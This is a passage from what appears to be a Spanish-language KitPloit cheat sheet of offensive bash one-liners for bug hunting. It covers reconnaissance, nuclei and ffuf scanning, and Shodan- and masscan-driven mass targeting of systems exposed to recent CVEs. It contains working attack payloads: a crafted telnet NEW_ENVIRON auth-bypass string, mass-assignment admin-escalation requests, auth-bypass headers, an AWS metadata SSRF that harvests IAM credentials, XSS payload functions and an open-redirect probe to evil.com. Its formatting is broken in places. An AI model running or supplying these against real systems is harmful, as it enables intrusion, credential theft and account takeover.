nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

root@kitploit:~
### Escaneo de CVE```bash
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Toma de control de subdominio```bash

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

root@kitploit:~
### Paneles Expuestos```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Malas configuraciones```bash

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

root@kitploit:~
### Modo DAST```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Etiquetas personalizadas```bash

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

root@kitploit:~
### Escaneo de Red```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 Pruebas de Seguridad de API

Introspección de GraphQL```bash

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

root@kitploit:~
### Enumeración de API REST```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

Análisis de JWT```bash

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | anew jwts.txt

root@kitploit:~
### Filtración de Claves API```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Autenticación rota```bash

Test endpoints without auth

cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

root@kitploit:~
### Prueba de Limitación de Tasa```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

Pruebas de BOLA/IDOR```bash

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

root@kitploit:~
### 💀 Fuzzing de endpoints de API con ffuf```bash
# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 Fuzzing de Versiones de API```bash

☠️ Discover hidden API versions

ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

root@kitploit:~
### 💀 Fuzzing de Métodos de API REST```bash
# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 GraphQL Fuzzing con ffuf```bash

☠️ Fuzz GraphQL endpoints for introspection and queries

ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

root@kitploit:~
### 💀 Fuzzing de Parámetros de API```bash
# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 Fuzzing de Bypass de Autenticación de API```bash

☠️ Test auth bypass techniques on protected endpoints

cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

root@kitploit:~
### 💀 OpenAPI/Swagger Fuzzing```bash
# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 Fuzzing de API JSON con Nuclei```bash

☠️ Mass API fuzzing with nuclei DAST mode

cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

root@kitploit:~
### 💀 Fuzzing de Asignación Masiva de API```bash
# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ con Generación de Wordlists Personalizadas```bash

☠️ Generate API wordlist from JS files and fuzz

cat js.txt | xargs -I@ curl -s @ | grep -oE "["']/(api|v[0-9])/[a-zA-Z0-9/_-]+["']" | tr -d ""'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

root@kitploit:~
## ☁️ Seguridad en la Nube

### AWS S3 Bucket Finder```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Verificación de Permisos```bash

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

root@kitploit:~
### Base de datos de Firebase```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage```bash

cat urls.txt | grep -oE "[a-zA-Z0-9-]+.blob.core.windows.net" | anew azure_blobs.txt

root@kitploit:~
### Almacenamiento de GCP```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF```bash

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

root@kitploit:~
### Archivos de credenciales en la nube```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Scripts de Automatización

Pipeline Completo de Reconocimiento```bash

#!/bin/bash domain=$1 mkdir -p $domain && cd $domain

Subdomains

subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt

Alive check

cat subs.txt | httpx -silent -threads 100 | anew alive.txt

URLs

cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt

Vulnerability patterns

cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt

Nuclei scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

root@kitploit:~
### XSS Hunter Script```bash
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

Script de Reconocimiento de API```bash

#!/bin/bash target=$1 mkdir -p $target/api && cd $target/api

Find API endpoints

cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

Extract from JS

cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^"'`\s<>]+)" | sort -u | anew js_api_endpoints.txt

Test GraphQL

cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

root@kitploit:~
## ⚙️ Bash Functions

Añadir a tu `.bashrc` o `.zshrc`:```bash
# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 Nuevos Oneliners 2026

⚡🔥⚡ TelnetPwn - CVE-2026-24061 (CVSS 9.8 - CRITICAL) ⚡🔥⚡

💀 Omisión de Autenticación en Telnetd de GNU InetUtils - ¡Shell Root Instantáneo! ¡Bajo Explotación Activa! 💀

⚡ 1. Descubrimiento Masivo de Telnet con Shodan```bash

💀 Find exposed telnet servers worldwide

shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt

root@kitploit:~
#### ⚡ 2. Nmap Detección de Servicio Telnet + Versión```bash
# 💀 Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt

⚡ 3. Masscan Fast Telnet Sweep```bash

💀 Ultra-fast telnet port discovery on large ranges

masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt

root@kitploit:~
#### ⚡ 4. GNU InetUtils Telnetd Fingerprint```bash
# 💀 Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt

⚡ 5. CVE-2026-24061 Verificación de Vulnerabilidad (Seguro)```bash

💀 Test for NEW_ENVIRON option support (vuln indicator)

cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login|root|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt

root@kitploit:~
#### ⚡ 6. Nuclei CVE-2026-24061 Escáner```bash
# 💀 Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt

⚡ 7. Captura de Banners + Extracción de Versiones```bash

💀 Extract telnet banners for version analysis

cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2.[0-7])" | anew potentially_vuln_versions.txt

root@kitploit:~
#### ⚡ 8. Subnet Telnet Hunter```bash
# 💀 Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt

⚡ 9. Telnet + Correlación de Huella Digital de OS```bash

💀 Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)

nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn

root@kitploit:~
#### ⚡ 10. Completo CVE-2026-24061 Pipeline de Reconocimiento```bash
# 💀 Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"

⚠️ Afectado: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) ✅ Solución: Actualizar a GNU InetUtils 2.8+ o deshabilitar telnetd y usar SSH


⚡🔥⚡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

💀 RCE Crítico No Autenticado en n8n Workflow Automation - ¡Más de 100,000 servidores afectados! Añadido a CISA KEV 💀

⚡ Detectar instancias de n8n (Shodan/Censys)```bash

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

root@kitploit:~
#### ⚡ Huella digital de instalaciones de n8n```bash
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

⚡ Comprobar Endpoints de Webhook Vulnerables```bash

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

root@kitploit:~
#### ⚡ Detección de Confusión de Content-Type```bash
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

⚡ Detección masiva de versiones de n8n```bash

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+.[0-9]+.[0-9]+"' | anew n8n_versions.txt

root@kitploit:~
#### ⚡ Verificación de Plantilla de Nuclei para CVE-2026-21858```bash
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Afectados: n8n < 1.121.0 | ✅ Corrección: Actualizar a n8n 1.121.0+


⚡🔥⚡ N8n Auth RCE - CVE-2026-21877 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

💀 RCE autenticado a través de Git Node en n8n - ¡Cloud y autoalojados afectados! 💀

⚡ Detectar instancias con Git Node habilitado```bash

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

root@kitploit:~
#### ⚡ Verificar endpoints de autenticación de n8n```bash
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Afectado: n8n < 1.121.3 | ✅ Solución: Actualizar a n8n 1.121.3+


⚡🔥⚡ D-Link DSL RCE - CVE-2026-0625 (CVSS 9.3 - CRÍTICO) ⚡🔥⚡

💀 Inyección de comandos en routers DSL D-Link heredados - ¡Bajo explotación activa! 💀

⚡ Shodan Dork para routers DSL D-Link```bash

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

root@kitploit:~
#### ⚡ Detectar endpoint vulnerable dnscfg.cgi```bash
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

⚡ Fingerprinting Masivo de D-Link```bash

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

root@kitploit:~
> **⚠️ Afectados:** Routers de puerta de enlace DSL D-Link heredados (EOL) | **✅ Solución:** Reemplazar con dispositivos compatibles

---

### ⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRÍTICO) ⚡🔥⚡

> **💀 RCE mediante Postgres Parameter Injection en Veeam Backup & Replication 💀**

#### ⚡ Detectar servidores de respaldo Veeam```bash
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

⚡ Identificar instancias de Veeam```bash

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

root@kitploit:~
> **⚠️ Afectado:** Veeam B&R 13.0.1.180 y anteriores | **✅ Solución:** Actualizar a 13.0.1.1071+

---

### ⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (ALTA SEVERIDAD) ⚡🔥⚡

> **💀 XSS Día Cero en Grafana - ¡46,500+ instancias aún vulnerables! Posible toma de cuentas 💀**

#### ⚡ Encontrar instancias de Grafana```bash
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

⚡ Detectar Versión de Grafana```bash

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+.[0-9]+.[0-9]+"' | anew grafana_versions.txt

root@kitploit:~
#### ⚡ Verificar Redirección Abierta (vector CVE-2025-4123)```bash
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

⚡ Detección Masiva de Páginas de Inicio de Sesión de Grafana```bash

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

root@kitploit:~
> **⚠️ Afectado:** Múltiples versiones de Grafana | **✅ Solución:** Actualizar a la última versión parcheada

---

### ⚡🔥⚡ CVE-2026 Subdomain Hunting - Pipeline de Detección Masiva ⚡🔥⚡

> **💀 10 Oneliners para cazar vulnerabilidades CVE-2026 en subdominios a escala! 💀**

#### ⚡ 1. Pipeline Completo de Caza de Subdominios CVE-2026 (n8n + Grafana + D-Link)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

⚡ 2. Detección masiva de n8n CVE-2026-21858 en subdominios```bash

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

root@kitploit:~
#### ⚡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner```bash
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

⚡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Caza de subdominios```bash

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

root@kitploit:~
#### ⚡ 5. Escáner Multi-CVE-2026 con Nuclei (Plantillas Paralelas)```bash
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

⚡ 6. Subdominio n8n Webhook Fingerprint + CVE-2026-21858 Verificación```bash

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

root@kitploit:~
#### ⚡ 7. CVE-2026 Búsqueda de IoT/routers (D-Link DSL + Otros routers)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

⚡ 8. Veeam CVE-2025-59470 Detección de Subdominio```bash

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13.0.[01].[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

root@kitploit:~
#### ⚡ 9. Combinado CVE-2026 Fingerprint + Extractor de Versión```bash
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

⚡ 10. Script de Automatización de Reconocimiento CVE-2026 Completo```bash

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

root@kitploit:~
> **🎯 Consejo profesional:** Combínalo con `notify` para recibir alertas en tiempo real: `... | notify -silent -provider slack`

---

### ⚡🔥⚡ Pipeline de Reconocimiento Avanzado - Edición 2026 ⚡🔥⚡

> **🎯 10 Oneliners Élite para reconocimiento integral - Enumeración multi-fuente, descubrimiento de ASN, análisis JS y más! 🎯**

#### ⚡ 1. Descubrimiento de Subdominios Multi-Fuente + Huella Digital Tecnológica```bash
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Combina Subfinder + Assetfinder + Amass para la máxima cobertura de subdominios, luego valida con httpx + reconocimiento de tecnología

⚡ 2. Enumeración de ASN + Descubrimiento de DNS inverso```bash

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

root@kitploit:~
> Descubre ASN, enumera bloques IP, realiza DNS inverso para encontrar subdominios ocultos

#### ⚡ 3. Pipeline de descubrimiento de URLs (Wayback + GAU + Katana)```bash
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Recopilación paralela de URL de Wayback Machine, Common Crawl, AlienVault + rastreo activo con deduplicación inteligente

⚡ 4. Análisis profundo de JavaScript + Escáner de secretos```bash

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

root@kitploit:~
> Encuentra archivos JS, extrae secretos codificados (claves API, tokens, claves AWS) y endpoints API ocultos

#### ⚡ 5. Transparencia de Certificados + Ataque de Permutación de Subdominios```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

Enumeración de registros CT + permutación inteligente (api → api-dev, api-staging) con resolución masiva de DNS

⚡ 6. Descubrimiento de puertos + Servicios web en puertos no estándar```bash

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

root@kitploit:~
> Escaneo rápido de puertos + descubre aplicaciones web ejecutándose en puertos inusuales (8080, 8443, 3000, etc)

#### ⚡ 7. Automatización de GitHub Dorking para la organización objetivo```bash
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Búsqueda automatizada en GitHub (dorking) para secretos, credenciales y exposición de datos sensibles

⚡ 8. Descubrimiento de Almacenamiento en la Nube (S3 + Azure + GCP)```bash

cat all_urls.txt | grep -oE '(s3.amazonaws.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.s3.amazonaws.com|storage.googleapis.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.blob.core.windows.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200|403" && echo "[+] {} - Accessible"'

root@kitploit:~
> Extrae y valida buckets de almacenamiento en la nube mal configurados a partir de URLs recopiladas

#### ⚡ 9. Descubrimiento de Parámetros + Coincidencia de Patrones de Vulnerabilidad```bash
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extrae parámetros únicos y los categoriza por tipo de vulnerabilidad (XSS, SSRF, SQLi, Redirect)

⚡ 10. Monitor de Reconocimiento Continuo (Listo para Cron)```bash

DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

root@kitploit:~
> Pipeline de reconocimiento persistente completo - detecta nuevos activos diariamente y envía notificaciones

> **🎯 Consejo profesional:** Ejecuta el oneliner #10 mediante cron para monitoreo 24/7: `0 */6 * * * /path/to/recon_monitor.sh`

---

### ⚡🔥⚡ Extracción de Endpoints de JavaScript - Técnicas Élite 2026 ⚡🔥⚡

> **🎯 10 Oneliners para extraer endpoints, secretos y APIs ocultas de archivos JavaScript! 🎯**

#### ⚡ 1. Descubrimiento Masivo de Archivos JS + Pipeline de Descarga```bash
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

